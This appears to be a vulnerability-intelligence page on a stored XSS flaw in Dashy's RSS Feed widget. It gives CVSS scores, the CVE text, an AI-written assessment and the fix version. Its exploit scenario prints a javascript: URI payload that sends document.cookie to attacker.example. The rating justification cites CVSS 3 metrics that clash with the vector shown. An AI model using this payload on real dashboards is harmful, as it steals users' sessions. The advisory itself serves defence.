Severity by source
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Feed-control prerequisite justifies AC:H; no Dashy privileges needed (PR:N); user click required (UI:R); javascript: executes in Dashy origin causing scope change (S:C) with session-level confidentiality impact (C:H).
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
Dashy is a self-hostable personal dashboard. From 1.9.4 until 3.2.0, the Dashy RSS Widget in src/components/Widgets/RssFeed.vue does not sanitize RSS item link values before rendering feed item titles and Read More links as anchor href attributes, allowing an attacker-controlled feed to provide a javascript: URI that executes when clicked in the Dashy origin. This issue is fixed in version 3.2.0.
AnalysisAI
Stored XSS via unsanitized javascript: URI injection in the Dashy RSS Feed widget (src/components/Widgets/RssFeed.vue) affects all releases from 1.9.4 through 3.1.x, allowing an attacker who controls an RSS feed source configured in the dashboard to deliver a malicious anchor href that executes arbitrary JavaScript in the Dashy origin when a user clicks it. The attack requires both feed-source control and user interaction, and is confined to the Dashy application origin - meaning session tokens, cookies, or dashboard credentials are the primary targets. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Two concrete prerequisites must both be satisfied: (1) the attacker must control or successfully compromise the content of an RSS feed URL that has been added to the Dashy RSS Feed widget configuration - this is the AT:P prerequisite in the CVSS 4.0 vector; and (2) a Dashy user must actively click the 'Read More' or title link rendered from the malicious feed item - the UI:A requirement. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector (AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N) accurately captures the key risk dimensions: the attack is network-delivered but requires high complexity and a specific prerequisite (AT:P) - the attacker must control or compromise the RSS feed URL configured in the widget. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker hosts or compromises an RSS feed and injects an item whose link element contains a `javascript:` URI payload (e.g., `javascript:fetch('https://attacker.example/exfil?d='+btoa(document.cookie))`). When a Dashy user with that feed configured views the RSS widget and clicks the rendered 'Read More' link, the payload executes in the Dashy browser origin, exfiltrating session cookies or tokens to the attacker's server. … |
| Remediation | Vendor-released patch: version 3.2.0. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
A vulnerability classified as critical has been found in Lissy93 Dashy 2.1.1. Rated medium severity (CVSS 4.3), this vul
Unauthorized configuration write in Dashy self-hosted dashboard (versions prior to 4.0.8) lets unauthenticated users or
Reflected XSS in Dashy's workspace view allows a remote attacker to execute arbitrary JavaScript in the victim's browser
Same weakness CWE-80 – Basic XSS
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44760